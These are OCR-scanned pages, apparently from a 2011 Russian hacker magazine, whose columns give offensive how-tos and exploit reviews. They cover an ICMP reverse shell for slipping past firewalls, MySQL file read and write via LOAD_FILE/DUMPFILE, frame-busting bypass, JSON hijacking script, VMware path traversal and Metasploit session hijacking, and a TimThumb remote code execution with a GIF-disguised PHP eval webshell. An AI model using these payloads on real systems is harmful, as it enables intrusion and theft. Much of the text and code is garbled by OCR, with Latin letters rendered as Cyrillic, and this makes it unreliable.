Сколько это стоил о? На тележку с моторами, аккумулятора ми и прочим 
ушло не более 100 долларов, нетбук я брал свой, но за пару сотен точно 
можно приобрести подобный слегка подержанный. И телеприсутству- 
вать в разных местах! 

Хотя на этом не стоит останавливаться! Легко заставить его кататься 
повагонамэлектрички, собирая пожертвования на развитиеотечествен- 
ной робототехники, итакокупитьзатраты на его постройку. Аможно 
установить на него полноценную робоопераиионкѵВ05( го5.ога/ѵѵікі/ ). 
навесить разнообразных датчиков и довести его по интеллекту до уровня 
ѴѴіІІоѵѵбагаде РВ2 ( доо.дІ/5Рг8 ) или РВоІ ( гЬоСги ). НС 
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ВЗЛОМ/ ЕА5ѴНАСК 



Тюрин «бгеепйод» Алексей, 0БесК6.ги(адгггсІод(адтаіІ.соппД\л/іиег.сопп/ап1уигіп) 





ОРГАНИЗОВАТЬ СКРЫТЫЙ КАНАЛ СВЯЗИ 
С КОМПЬЮТЕРОМ ЗА ФАЙРВОЛОМ 



ЗАДАЧА 



РЕШЕНИЕ 

Конечно, самое простое — этозабиндить шелл на каком-нибудь 
ТС Р- порту или организовать ЬасксоппесС Но что делать, если эти 
возможности недоступны: на бинд-шелла не хватает прав, а исходя- 
щие ТСР-коннекты блокируются файрволом? 

В нашем распоряжении все другие протоколы, инкапсулировать 
можно куда угодно. Один из отличных вариантов — использовать 
ОИВ-туннель в варианте, реализованном Алексеем Синцовым (читай 
в 147-м выпуске X). Но сегодня мне хотелось бы рассказать об исполь- 
зовании шелла, работающего через протокол I С М Р, — а если конкрет- 
но, то о реализации от Вегпагсіо Оатеіе и его друга N ісо: геѵегзе істр 
зИеІІ. Как ясно, в данном случае на клиенте (то есть у нашей жертвы] 
открывается шелл и весьего исходящий трафик пихается в паке- 
ты ІСМРесИо гециезі (обычные ріпд'и]. У нас на сервере мы парсим 
данные входящих запросов, а в ответных ІСМР есЬо-герІу- па кетах 
передаем команды клиенту. 

В при нципе, тема довольно стандартная, но здесь есть две от- 
личительные и приятные для насособенности. Во-первых, так как 




Работа ІСМР-шелла:сверху— клиент, внизу— сервер 



этопосути ЬасксоппесС то шансы преодолетьфайрвол существенно 
повышаются. Во-вторых, и это главная фишка, этотшелл нетребует 
а дм и неких прав: разработчики потрудились и не использовали гаѵѵ 
зоскеСы. Итак, юзаем. 

У жертвы 

іетрзіі.ехе -1: Ііа.ск.ег. ір 

Имеется несколько настроек клиента, которые выбираются в зави- 
симости отнеобходимой скрытности и скорости канала. Тулза немного 
глючит, такчто некорректные настройки будутзаметно сказываться на 
работоспособности. 

У себя 

./істрзИт.ру Иа.ск.ег.ір ѵі.сіі.іт.ір 

Здесь мы указываем по очереди свой ІР и адрес нашей жертвы, 
откуда будут приходить пинги. Клиентская часть на писана только под 
ѴѴіпсІоѵѵз, что, в общем-то, логично. Работает отлично у бесправных 
юзеров, как на ХР, так и в7-ке. 

Серверная часть реализована сразу на трех языках — РегІ, С, 
РуіИоп. Хотя и заявлена работа на всех ОС, нона практике нужно поль- 
зоваться никсами. Связано это как минимум с тем, что перед за пуском 
серверной части необходимо отключитьу ОС ответы на входящие 
ІСМР-ріпд-запросы: 

зѵзсііі -ы пе1:.ірѵ4.істр есНо і%поге а!1=1 

Еще одна приятность в том, что данный ком п л екттеперь официал ь- 
новходитвзцітар. 

Конечно, защититься отта кого хека очень просто: админу будет 
достаточно л ишь заблокировать исходящий ІСМР-трафик. Однако на 
практике это делается крайне редко, поэтому тема будет работать в 
абсолютном большинстве сетей. 



042 



ХАКЕР 10/153/2011 









ЕА5ѴНАСК 



ПОЛУЧИТЬ ДОСТУП К ФАЙЛОВОЙ СИСТЕМЕ ИЗ МѴ50І. 



ЗАДАЧА 



РЕШЕНИЕ 

Сейчас блекхатам часто нетсмысла лезь в корпоративную сеть, ведь 
основной профит — база данных, которая обычно «доступна» через 
веб-портал компании. Сломал сайт — получил доступ к БД, дальше 
лезтьобычно нетсмысла. 

Нотакбываетне всегда. Например, ситуация: мы поимели какую-то 
базуданных, но наша цель — другая система натомжехосте. Воттути 
появляется задача получить возможность выполнять команды в ОС или 
хотя бы читатьфайлы. Второго добиться проще, так какэтот функцио- 
нал часто доступен непривилегированным пользователям СУБД. 

Основной путь — использование функции І_оаб_РіІе(]. Для чтения 
необходимы привилегии РНЕ и СРЕАТЕТАВБЕ. Кстати, под виндой 
шансов на удачное чтение файлов больше, так как мускул запускает- 
ся под при ви легирован ной учетной за пи сью БосаІБуз^ет. В лучшем 
случае, если у нас есть возможность выполнять последовательность 
команд, для чтения бинарного файла потребуется следующий код: 

5 Е БЕ С Т НЕ X ( БО АР_ Р I БЕ (С : / Се 5 С . е хе) ) ІІЧТО РЦМРРІБЕ 'с:/міпсІ0М5/ 
Сешр/ЫаЫаЫа'; 

СГСЕАТЕ ТАВБЕ пеасіізезі: (сіаіза Іоп^СехІ:); 

ЮАР РАТА ІІЧРІБЕ , с:/ыіпсIо^л^5/1:етр/ЫаЫаЫа , ІІЧТО ТАВБЕ 
пеасІСеБІ: РІЕБР ТЕКШИАТЕР ВУ '\Ѵ (сІаСа); 

Поясню. Здесь в первой строке мы читаем необходимый бинарники 
пихаем его во временный файл в шестнадцатеричном виде. Это необхо- 
димо для того, чтобы превратить би на рн и к в «обычный» текст. Дальше 



создаемтаблицусодним полемтипа ІопдИхБ Втретьей строке — под- 
гружаем только что созданный временный файл в нашу новую табличку 
с учетом разбиения строки по типу окончания строк. В общем, все логич- 
но. При чтении текстовых фай лов от первого пункта можно избавиться. 

Для того чтобы записать файл в ОС, необходимо иметь права РІ БЕ, 
БІРОАТЕ, ІЫБЕРТ, СРЕАТЕ ТАВБЕ. По сути, нам требуется уже описан- 
ная команда БЕ БЕСТ с указа ни ем ІІЧТООБІМРЕІЕЕ. Сразу отмечу, что у 
нас есть возможность только переза писывать существующий файл, 
но никто не мешает нам сначала его прочитать, а потом, добавив свои 
данные, записатьобратно. В сложных случаях, когда нам необходимо 
залитьбинарник, мы можем воспользоваться следующей последова- 
тельностью. Во-первых, разбить би на рн и к на части в виде Иех-строки 
длиной по 1 024 байта. Во-вторых, выполнить следующие команды: 

СКЕАТЕ ТАВБЕ мгі1:е1:е5І:(сІа1:а1оп§Ь1о§); 

ІИЗЕКТ ІИТО ыпі1=е1=е5І=(сІа1=а) ѴАШЕ5 (0х4сІ5а90.. 610000); 

ЦРРАТ Е мпі1:е1=е5 І= ЗЕТ с!а1= а= СОІ ЧСАТ (сіаіга ,Ѳхаа27ѲѲѲѲ ѲѲ...ѲѲ ѲѲѲѲ) ; _ 

5ЕБЕСТ сІа1:а РВОМ мгіііеііезі: ІІЧТО ОІІМРРІБЕ ' С :/\л/іпсІо\л/5/Тетр/1:е5І; . ехе ' ; 

Здесь мы на первом шаге создаем табличку с одним полем для 
хранения бинарника. На втором шаге в данное поле мы кладем первую 
Иех-строку. Апотом последовательными командами конкатенации 
добавляем остальные Нех-строки. На последнем шаге, за счет сел екта, 
скидываем значение поля вехе'шиквлюбом месте ОС. Описанные мето- 
дики основаны на работе Бернандо Да меле (ВІаскНаі2009, доо.аІ/23808 ). 



ОБОЙТИ РРАМЕВІІ5ТІМ6-ЗАЩИТУ 



ЗАДАЧА 



РЕШЕНИЕ 

Пару номеров назадя рассказывал проХББ-Ігаск ( доо.д|/ІХтР8 ) — на- 
грузку для ХЗЗ-уязвимостей. Суть ее в том, что она добавляет на 
уязвимую страницу фрейм размером во весьэкран, в котором за- 
гружается другая страница этого же домена. Пользователь при этом 
видит нормальную страницу сайта, но всеего действия отслежива- 
ются ХЗЗ-трекером: все, что находится внутри фрейма, доступно из 
ЭаѵаЗсгірБ а кроме того, некоторые действия можно и эмулировать. 
Кросс-доменные политики тут не действуют, так как пользователь не 
покидает домена. 

Впрочем, от таких фреймовых на грузок давно уже есть за щита. В 
простейшем видеона представляетсобой небольшой ^ѵаБсгірБ 

<5сгір1: 1:уре= ,, 1:ех1;/даѵа5спір1: ,, > 

і-РСЕор != 5е1Я Ііор.ІосаІііоп.герІасеСІосаІііоп); 

< / 5 С Г ІДІ > 

Данный скрипт размещают на страницах защищаемого сайта. Он 
проверяет, загружен ли в фрейме, и перезагружает страницу в случае 
обнаружения этого факта. Нои здесь мы кое-что можем сделать. Один 
из способов, правда, не очень гуманный — обрезать возможности 
яваскрипта во фрейме. Делается это за счет использования параметра 
запсІЬох, который появился в НТМБ5 иуже поддерживается браузерами. 

сБРгате 5пс=?И1:1:р://ыыы.ѵіс1:іт.сот? 5апсІЬох= ,, а11ом-5ате-опі§іп 
а11ом--Ропт5 а11ом-5спір1:5 ,, ></і-Рпате> 

Здесьмы «разжали»нашупесочницу, позволяя проводитьболь- 
шинстводействий внутри фрейма в штатном режиме. Если мыуберем 
аІІоѵѵ-5сгір1:5,тояваскрипты внутри фрейма незапустятся. Ночто важ- 



нодля нас, аІІоѵѵ-Іор-паѵідаБіоп в списке разрешений отсутствует, тем 
самымзапрещая скриптам внутрифрейма переходить на другие сайты 
основным окном. То есть с фрейма жертва уже никуда не денется. 

У да иной технологии обхода катеЬиз^і пд -за щиты есть один 
временный минус: поддерживается эта новая НТМБ5-фича только по- 
следними браузерами, да итоне всеми. Тутуж за дума ешься, насколько 
круто иметьсамый продвинутый браузер. 

В качестве экспериментального и браузерозависимого варианта 
можно предложить идею обхода за счет встроен ной в ІЕ8/9защиты отХ55. 
Фича втом, чтобы переходитьна страницы скатеЬизбпд'ом, добавляя 
в адрес при переходе простейшие ^ѵаБсірБы (Х55). Фильтр ІЕ, «увидев» 
отраженнуюХББ'ку, автоматом отключаетяваскриптна странице (той, что 
внутри фрейма), и катеЬизІіег не активируется. Таким образом, для экспу- 
латации нам нужны почти двеХББ-дырки. Одна длятого, чтобы подгру- 
зить яваскрипт с фреймом ЫогесІХББили ге^ІесБесІ, если ты знаешь, как 
обойти ІЕ-фильтр), и вторая — для подстановки во фрейме и активации 
фильтра в ІЕ. Согласен, чтохитро, но какидея это довольно интересно. 




Включаем песочницу— отключаем яваскриптвофрейме 
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ВЗЛОМ/ ЕА5ѴНАСК 



ВЫЖАТЬ МАКСИМУМ ИЗ Х55 



ЗАДАЧА 



РЕШЕНИЕ 

Я хочу немного поведать о БЬеІІ оНЬе РиШге. Ксожалению, 

это всего лишьэкспериментальная разработка, так что пока кратко. 

В НТМІ_5 появляется такая вещь, как СОВ — Сгозз-огідіп гедиезіь. 

С их помощью браузеры смогут посылать кросс-доменные вызовы 
и получать ответы, если сервер это разрешит. В итоге можно будет 
туннелировать НТТР-трафик. По идее это выглядит так: 

1. Жертва переходитпоссылкесХББ. 

2. Х55 подгружает на грузку — шелл (БНеІІ оЙНе РіЛиге). 

3. Мы разрешаем на своем сервере прием таких СО В'ов. 

4. Шелл отслеживаетдействия пользователя и отправляетихСОВ'ами. 

5. В СОР-ответы мы кладем необходимые для выполнения команды. 

6. Наш шелл читаетответы СОР и выполняетнеобходимые действия. 

До пятого пункта все работает прямо сейчас. По сути основная 
фича — это возможностьобработки ответов ЗаѵаБсгірСом. В итоге мы 
получаем реверсовый Шр-шелл. 

Технологии движутся. Что самое страшное — можно ползать по 
атакуемому сайту от и мен и нашей жертвы в своем браузере. Но здесь 
уженепомогутни^гатеЬиз^іпд, низащита кукисов флагами НирОпІу/ 
Бесиге. Автор этого чуда — Лавакумар Куппан. Если интересноуглу- 
биться, рассмотретьтонкости и попрактиковаться — ѵѵѵѵѵѵ.апсІІаЬз.огд/ 
ІюоІз/зоіТ/зоіШтІ . 




БЬеІІоІІЬеРиІиге: официальная схема 



УКРАСТЬ КОНФИДЕНЦИАЛЬНУЮ ИНФОРМАЦИЮ 



ЗАДАЧА 



РЕШЕНИЕ 

Вданнойзадачкеяхочурассказатьотакой вещи, какЗБОМ 
Нцаскіпд. И хотя сейчас эта техника не слишком актуальна, мне 
оченьзахотелось рассказать о ней, так как она использует довольно 
интересные и нестандартные подходы. Итак, напомню: 350ІЧ — это 
текстовый форматобмена данными, основанный на ЗаѵаБсгірІ: и 
используемый сейчас восновном в А)ах-приложениях. 350Ы Нуаскіпд 
— по сути, это подвид С5РР (Сгозз-зИе гециезі: Іюгдегу), во всяком 
случае основан на нем. 

Предположим, унасестьсервер, который при отсылке на Шр:// 
зегѵег/зесгеЫп^одзоп 6ЕТ-запроса изучаетнаши куки (например), и 
если они имеют определенное значение, возвра щает конфиденциаль- 
ную информацию: 

["аааа", "раззмопсі"] 

Такая ситуация и называется С5РР — ведь сервер не проверяет ни- 
чего, кроме наличия кукисов, и мы можем подделать запрос, например, 
разместив на любой странице в интернете следующий код: 

<зсгір1: згс=Н1:1:р://5егѵег/5есге1:-іпТо.І50п> 

При обработке такой страницы браузер отправит запрос на сервер 
и получит секретные 350 Ы-данные. Но вот беда — это же не код 
ЗаѵаБсгірр а массив 350 И, и браузер, понятное дело, не сможет его 
исполнить. Как же нам получить отсюда данные? Решение лежит в 
том, чтобы переопределить в ЗаѵаБсгірІ: понятие массива в функцию 
следующим образом: 

<зсгір1: 1:уре="1:ех1:/даѵа5сгір1: ,, > 
ѵаг з есге1і5; 

Апга ѵ = -РипсІііопО { 

весгеіз = 



}; 

</зспі р1:> 

Теперьполучаемый ссервера массив 350И будетобрабатываться 
как функция, возвращающая значение. Для извлечения значений по- 
требуется следующий скрипт. 

//делаем 6ЕТ-запрос и получаем 350ІМ 

<зсгір1: зпс="ІтІ:1:р://5епѵеп/5еспе1:-іп-Роо50п" 
1:уре= ,, 1:ех1:/даѵа5спір1: ,, ></5спір1:> 



//Вынимаем данные из функции (бывшего массива') 
<зсгір1: 1:уре= ,, 1:ех1:/іаѵа5сгір'Е"> 



ѵаг ѵоипРаІіа = 

ѵаг і = -1; 

ыІті1е{5еспе1;5[++і]) { 

ѵоигРаІіа += зесге1:5[і] + ' 



аІегѣСУкрадено: ' + уригРа^а): 

</зсгір1:> 

В итоге получается следующая ситуация. Мы создали специальную 
страницу, которую можем разместить где угодно в интернете. Жертва 
заходит на нашу страницу, и при условии, что она аутентифицирована 
на уязвимом сервисе, мы получим конфиденциальные данные с этого 
сервера. В качестве примера можно вспомнить знаменитый баг в бтаіі, 
который здорово нашумел в 2006 году: тогда можно было получать 
списокконтактов пользователя и читатьего почту. 

К счастью или ксожалению, сейчас данный метод не работает: на 
уровне браузеров запрещена возможность переопределения Аггау. 
Хочешь проверить, что баг работает, — ищи браузер времен Рігеі'ох 2.0. 
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ЕА5ѴНАСК 



ПОЛОМАТЬ ВИРТУАЛКИ ПОД ѴМѴѴАРЕ 



ЗАДАЧА 



РЕШЕНИЕ 

Виртуализация, виртуализация, виртуализация — сейчас этим уже 
никого не удивить. Со всей своей бородатостью, виртуализация 
сейчас активно проникает и успешно замещает существующие 
инфраструктуры в различных компаниях. Оно и понятно: есть 
масса плюсов — большое количество возможностей, глубокая 
гибкость, централизованное управление, снижение финансовых 
затрат. Иупомянутая борода — как гарантия того, что большинство 
возможных проблем уже были кем-то решены. 

Впрочем, есть и трудности. Думаю, всем понятно, что если взлом- 
щику удастся поломать хостовую ОС, то считай, что и все лежащие на 
ней гостевые системы тоже уже его. Однако были и примеры багов, 
при которых специальный сплоит мог «сбегать» из гостевой ОС в 
хостовую. Это реальная жесть: стоит поломать одну машинку — и счи- 
тай, ты поимел всю сеть. Пример подобного такого сплоита я видел 
только один: автором был кто-то из Іттипі^у, а уязвимость была в 
видеодрайверах. 

Но это конкретный хард кор.Что же мы можем сделать на прак- 
тике? Все примерно то же самое, только гораздо проще. Давай 
вспомним, с чего все начинается. Конечно, с обнаружения целей, 
с фингерпринта.Итак, наши цели это ѵЗрЬеге, ЕЗХ, ЕЗХі, ѵСеп^ег, 
Зегѵег. Простейшие гуглодорки: 

іпіі1:1е:"ІлІе1 соте іо Ѵтмаге Е5Х" 

іп1:і1:1е:"ѴМмапе Мапа^етепі: Іпіег-Расе:" іпип1:"ѵтмапе/еп/" 

Далее портскан: можно выделить порты 902/903, ответственныеза 
удаленное подключение к хостовой ОС ѵтѵѵаге-клиентом и стандарт- 
ный набор портов Шр с веб-сервером «ѵтѵѵаге ШрсІ». Более четкий 
список — доо.дІ/ІМсІМГѵ . 

Что дальше? Хотя портскан и показываетнам версию хостовой 
машины, это очень приблизительная информация. ѴМѵѵаге позволяет 
нам узнать точную версию вплоть до номера билда. Для данной цели 
я накрапал скрипт для птар'а. По своей сути, ничего экстраорди- 
нарного: на 443-й порт отправляется специально сформированный 
ЗОАР-запрос, который и предоставляет нам необходимые данные. 

Теперь, когда мы точно знаем, кто наш противник, — переходим 
в наступление. В общем -то, здесь главное — «продукт» ѴА5Т0. 

Это набор модулей к МеіазрІоМ: Ргатеѵѵогк от итальянских хакеров 
Клаудио Крисционе и Паоло Каналетти, которые были представле- 
ны на В ІаскНаі 2010 ( ѵазіо.піЬЫезес.ога ). Набор позволяет произ- 
вести целый ряд атак на разнообразные системы виртуализации. 

Мы посмотрим несколько из них. «Установка» модулей проста до 
невозможности: разархивируем папку и кидаем все файлики в 
%тз{гатеѵѵогк%\т5{3\тобиІе5\аихіІіагу\ѵа5*о (у некоторых мо- 
дулей есть жестко приписанные пути). Далее, если взламываемая 




Классический портскан Е5Х4 



система старая (примерно 2009 года, ЕЗХ до версии 3.5), то отличная 
вещь для баловства это бага СѴЕ-2 00 9-3733. Суть — простейший 
траверса л ди ректор и на хостовой машине: 

Иіір5://ѵісііт.сот/5СІк/%2Е%2Е/%2Е%2Е/%2Е%2Е/%2Е%2Е/%2Е%2Е/%2Е 

%2Е/еіс/ра55мсІ 

Что это дает нам? Захватить контроль над хостовой ОС мы не 
можем, но вот скачать все гостевушки — легко. Для этого читаем /еіс/ 
ѵтѵѵаге/Ноз1:сІ/ѵтІпѵепІогу.хтІ и с учетом этих данных определяем 
пути до ѵтх'ов. 

Из новенького сразу можно вспомнить другой вектор атаки, 
нацеленный на ѵСепІег — систему централизованного управления 
большим количеством виртуалок. В ѵѵеЬ- сер вере іеМу до 6.1.16 при- 
сутствует траверса л: 

Ніір5://ѵісііт.сот/ѵсі/сІомп1оасІ5/Неа1іИ.хт1/%ЗР /. ./. . 
/../•• А. /апу_51е 

Через этот баг можно добраться до файлов с секретными иден- 
тификаторами клиентов (ѵрхсі-ргоіііег-*), которые играютроль 
своеобразных кукисов для общения клиента ѵСепІег с сервером. 
Используются эти идентификаторы с помощью модуля ѵтѵѵаге_ 
зе55Іоп_гісІег.гЬ, входящего в комплект ѴА5Т0. Последовательность 
действий такова: 

1. Черезтраверсал получаем идентификатор. 

2. В М5Р: 

Ц5Ѳ аихі1іагу/ѵа5іо/ѵтіл?аге 5Ѳ55ІОП гісіег 
зеі КНОБТѵісііт.сот 

5еі 50АРІР Ѳ4Р4ѲС81-564Е-4511-АСѲР-Р57РРА571Е4Е 

(это идентификатор) 

пип 

3. В ѵСепІегклиенте (VI сІіепі)указываемхост: 127.0.0.1:9999. 

4. Осуществляем подключение. 

После этого, если идентификатор еще жив, произойдет под- 
ключение к ѵСеп^ег'у, при этом работа в самом клиенте никак от- 
личаться не будет. Так как идентификатор имеет довольно короткое 
времяжизни (порядка 5 минутпосле выхода из системы), то в ѴА5Т0 
прилагается автоматизирующий все манипуляции файл — ѵтѵѵаге_ 
аиІюрѵѵп.гЬ. Есть и еще несколько модулей под другие продукты как 
ѴМѵѵаге, так и других разработчиков, но это оставим на самосто- 
ятельное изучение. 




Определяем точную версию продуктов ѴМѵѵаге 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



іѵ(іѵіп5ІсІе.Ыод5роСсот) 
ріЫагаіІ (1 1 561 2, дер. Красная звездочка, д.1) 




( АѴ: Ы/АС : Б/АУ : N/0: Р/І : Р/А: Р) 

МгЛЗД 

Плагин ТіпТНитЬ используется многими темами в движке ѴѴогсІРгезз 
и представляет собой скрипт-утилитуЛт1;ИиппЬ.рИр, которая за- 
нимается масштабированием изображений. Гугл показываетоколо 
40 млн упоминаний этого скрипта, что позволяет назвать его весьма 
популярным. В начале августа началась волна взломов, связанных 
с этим скриптом, даже блог разработчика этой утилиты был успешно 
хакнут с помощью баги! Уязвимость существует из-за того, что скрипт 
позволяет загружать и исполнять РНР-код в папке с кешем. Итак, раз- 
беремся, чтожетутпроисходит. 



Начнем стого, что закешировать файл можно с помощьютакого запроса: 



М1:1:р://ѵллМл/.1:аг^е1:.1:1сІ/мр-соп1:еп1:/1:Иете5/ТНЕМЕ/1:іт1:ІіитЬ. 

рИр?5гс=И1:1:р://Ь1о%%ег.сот.еѵі1сІотаіп.1:1сІ/росб1е.рІір 



СѴ55Ѵ2 



Обзор 
эксплоитов 



Сегодня мы покажемтебе, какзавалить враже- 
ский блог на ѴѴогсІРгезз'е, как возыметь власть 
над лазерными принтерами НР, как натянуть 
ничего не подозревающих пользователей 
РігеЬх'а, а также приведем очередное под- 
тверждение тому, что в этих ваших линуксах (с) 
тоже есть дырявый софт. 



Удаленное выполнение кода 
в ѴѴогсІРгевб'е ТітТГіитЬ 



■ 
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Обзорэксплоитов 




Запускаем калькулятор через багу в ІітІНитЬ.рІір 



Слово «ТН ЕМ Е» следует заменить на название темы, ну и та к да л ее. 
Разумеется, не всё так просто. Во-первых, кешировать файлы раз- 
решается не с любых доменов, а только с доверенных. По умолчанию 
список этих доменов представлен таким массивом: 

$а11омесІ5і1:е5 = апгаѵ ( 

'Ліскг.сот', 

’рісаБа.сот'. 

'Ыо^ег.сот', 

'могфгеББ.сот', 

, іт§.уои1:иЬе.сот , і 

, ир1оасI.мікітесIіа.о^% , . 

, рI^о-I:оЬиске1:.сот , ^ 



Фей л здесь состоит в том, что ссылка проверяется функцией зігроз 
таким образом, что если где-либо будет встречаться такая подстрока, 
то ІІПІ_ пройдет проверку, что и было продемонстрировано в вышеобо- 
значен ном запросе. Если лень заморачиваться с поддомена ми, то 
можно просто за действовать пап кус именем разрешенного домена. 

Вторая фигня состоит в том, что мы должны дать понять скрипту, 
что он имеет дел о с изображением, а не с каким-то там РНР- кодом. Это 
достигается тем, что в начало нашего файла мы побайтово вставляем 
какую-нибудь картинку, чтобы она там висела по всем правилам фай- 
лового формата. Полезно будет изучить инфу по ссылке 

,там обсуждается создание миниатюрного 6ІР-файла размером 
в 35 байт. Итак, копируем эти 35 байт в фай л, а после них (!) размещаем 
произвольный РНР-код — прием, в общем-то, известный и исполь- 
зуется оченьчасто. В качестве РоС автором эксплоита приведен 
следующий вариант: 

\х47\х49\х46\х38\х39\х61\хѲ1\хѲѲ\хѲ1\хѲѲ\х8Ѳ\хѲѲ\хѲѲ 

\хРГ\хГГ\хГР\хѲѲ\хѲѲ\хѲѲ\х21\хР9\хѲ4\хѲ1\хѲѲ\хѲѲ\хѲѲ 

\хѲѲ\х2С\хѲѲ\хѲѲ\хѲѲ\хѲѲ\хѲ1\хѲѲ\хѲ1\хѲѲ\хѲѲ\хѲ2\хѲ2 

\х44\х01\х00\хЗВ\х00\хЗС\хЗР\х70\х68\х70\х20\х40\х65 




Выполнение полезной нагрузки в РігеТохЗ.6.16 



\х7б\х61\хбС\х28\х24\х5Р\х47\х45\х54\х5В\х27\х63\х6Р 

\хб4\х27\х5Р\х29\хЗВ\х20\хЗР\хЗЕ\хѲ0 

Эта простыня на самом деле представляетизсебя простейшую 
6 ІР-картин кус дописанным в конце бонусом в виде <?рИр(ЭеѵаІ($_ 
СЕТТсітісГ]] ?>. После скармливания нашего файла скриптубпгЛитЬ.рНр 
его можно будет обнаружить в папке /ѵѵр-соп^еп^ЛНетез/ТН ЕМ Е/сасНе/ 
и, чтосамоеглавное, безболезнен но запустить его оттуда. Дополнитель- 
ное описание можно взять отсюда: уууууу.ехдМ^ф^шіі/ехдМіз/ІТбОЗ. 



ТАК6ЕТ5 



ѴѴогбРгеззТітТНипгіЬ РІидіп 1.* — 1.32 



Боилісж 



Существуетнесколько рекомендаций по поводу решения этой про- 
блемы. Во-первых, обновление: в версии 1.34 проблема уже решена. 
Во-вторых, можно тупо удалить этот скрипт, убедившись при этом, что 
без него блог работает нормально. В-третьих, рекомендуютудалить 
все строки из массива с доверенными доменами, то есть заменить 
вышеупоминавшийся массив на $а11оыесІ5і1:е5 = апгау();. Таким об- 
разом, скрипт сможет работать только с локальными файлами, чего в 
большинстве случаев достаточно. 

Крометого, еслиты являешься владельцем блога на ѴѴогсІРгезз'е, 
то не помешает проверить, не поимели ли тебя с помощью этой баги: 

1. Залогинься на сервер через 55Н. 

2. Перейди в директорию с ѴѴогсІРгезз. 

3. Выполни команду«дгер-гЬазе64_сІесосІе*». Если в результатах 
выдачи присутствуют дли иные закодированные строки, то, воз- 
можно, тебя поимели. 

4. Также следует проверить директорию Ат р на наличие подозри- 
тельных файлов с расширениями Іхі или рНр. 



2 



Множественные уязвимости в принтерах 
НР І.а5егІе1 Рхххх Зегіез 



СѴ53Ѵ2 



7.8 



( АѴ: Ы/АС : Ь/Аи : N/0 : С/І : Ы/А : N ) 

Ктобы могподумать: всоставе Ме^азрІоН: Ргатеѵѵогк'а планомерно 
начинают появляться эксплоиты под аппаратное обеспечение разного 
рода. На этотраззатронуты были принтеры І_а5егЭе* фирмы Неѵѵіеи- 
РаскагсТ Кажется, недалектотдень, когда будутпоявляться эксплои- 
ты под микроволновки и стиральные машины. Сегодня же под удар по- 
пали те принтеры, где имеется возможность у правления по Сети через 
специальный язык РЛ_ (Ргіпіег ЭоЫапдиаде). Путем формирования 
специальных запросов к принтеру через стандартный ЭеШігесІ-порт 
9100 можно получить доступ к файловой системе принтера, а также 
посылать произвольные команды на языке РЛ. 



ЕХРЮІТ 



Два модуля под принтеры доступны всоставе МБР подименами Нр_ 
ргіпІег_ріІ_1:гаѵег5аІ и Нр_ргіпІег_ріІ_стсІ. Первый ихних позволяет 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



I 



Старшіе адреса 



1 

1 

Попадаем сюда 
ОкЗсОсШгі 


Г'""" 1 

| Щѵгие структуры ; 


Неиспользуемый 
участок памяти 


ь. 


ско&ьоооо 

1 

1 

1 


Куча 


! Другие структуры | 



і 



МПЭДД** ДДЖ І 

до 0*00000000 



Ло гі?имет?»*Т'» т 
Ьеуря эгзуло 



♦ Старше адреса 
доО*7ШГ 

1 

| 


Г ] 

! другие структуры ; 

і 


ПСГІЗДЖМСЮДД 




Внедренная куча 




внедренная кума 




Внедренная куча 


*- 


Внедіжнная куча 


ОлС&Ьоооо 


Куча 


і 


другие структуры ; 



}ГВр+5^&* 



і 



Мяздше іджл 

до 0*00000000 



Піхпі лоичененич томкн 

«ЭМуГО 



Схематическое изображение метода Ьеарзргауіпд 



получить доступ к файловой системе принтера. Опции эксплоита не 
отличаются оригинальностью: 

• РНОЗТ — таргетный адрес. 

• РРАТН — путь вудаленной файловой системе. 

• РРОРТ — таргетный порт. 

Читать файлы можно командой «!г РНЕ» в интерактивном режиме, 
переходить в корневую директорию командой «/», а командой «..» — 
на один уровень вверх по файловой системе. По ее структуре, кстати, 
можно заметить, что на принтерах стоит некая юникс-подобная ОС 
(типа І_упх05], а если прочитать фай л /еіс/раззѵѵсі, можно обнаружить, 
что в качестве командной оболочки фигурирует/Ьіп/сІІзЬ. 

Второй модуль МБР позволяет отсылать произвольные РЛ_- 
команды принтеру. Помимо уже привычных опций РНОЗТ и РРОРТ, 
есть важный параметр СМ 0 — собственно команда, отсылаемая 
принтеру. В нашем примере фигурирует команда чтения файла /е^с/ 
раззѵѵсі, хотя на самом деле их достаточно много, при желании можно 
ознакомиться с мануалом к этому языку по ссылке Шр://аоо.аІ/ЦКезр . 



ТАК6ЕТ5 



НР БазегЭеІ: РххххБегіез, возможно, все принтеры БазегЭеІ: с поддерж- 
кой управления поСети. 



50і_ілі(ж 



На данный моментрешения проблемы не обнаружено. 



3 



Рігеіох 3.6.16 ОВ.ІЕСТ тСНаппеІ Кетоіе Сосіе 
Ехесиііоп Ехріоіі ШЕР Ьуразз) 



СѴ53Ѵ2 



10.0 



(АѴ:М/АС:І_/Аи:М/С:С/І:С/А:С1 

Щ|:У 

Дата релиза: 5 августа 2011 года, автор: РИО, СѴЕ: СѴЕ-201 1-0065. 

Уязвимость изе-аНег-^гее в МогіІІа Ріге^ох 3.6.1 6, дающая возмож- 
ность атакующему выполнить произвольный код в контексте пользо- 
вателя, запустившего браузер, была обнаружена гедепгесИКом, а опи- 
сываемый здесь модуль для теіазріоіі'а создан РИО. Суть уязвимости 
заключается в том, что тСИаппеІ, являющийся элементом ОВЭЕСТ'а, 



может быть освобожден через метод ОпСНаппеІРесІігес*, принадле- 
жащий интерфейсу пзІСИап пеі Еѵеп1:5іпк, в результате став висящим 
указателем. Впоследствии он может быть повторно использован, 
когда будетпроисходитьустановка атрибутов данныхдля ОВЭЕСТ'а. 

Описываемый модуль для теіазріоіі'а использует в своей реализа- 
ци и технику Иеарзргаус РОР-цепочкой для обхода механизма йЕРна 
ѴѴіпсІоѵѵзХРБРЗ. 



ЕХРЮІТ 



Использование ранее освобожденной памяти можетпривести краз- 
личного рода неблагоприятным последствиям, начиная от искажения 
используемых да иных до исполнения произвольного кода. В про- 
стейшем случае искажение данных можетпривести к повторному ис- 
пользованию освобожденной системы памяти. Ошибки изе-аНеМгее 
имеют две общих и иногда пересекающихся причины: 




Один из популярных принтеров НР, подверженныхуязвимости 
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Обзорэксплоитов 







0? 



Емтчй»; З+НІГіЩП* ТПгРи .РРгчи^Лч^еіІетчгаЛгйві^гііНГІигаЗІМ 
Р№1№ ЕВ 1 0*И»Л И ** * р*чгИ****інп шя* г ѵ Чч ютУ-Ш ь* >М 
$ІЛІЖІ У№ №НП№»1^П №* 

ушгалггда*з ТІХІп-щйЦіК^Ваі^гпглтетіІ РГЯ'-АО-ІЕГ 
н Р 1 1. *|>Т| а 4 «ПСІ 1Ы рпп]п ш М*г< МпНкѵ 
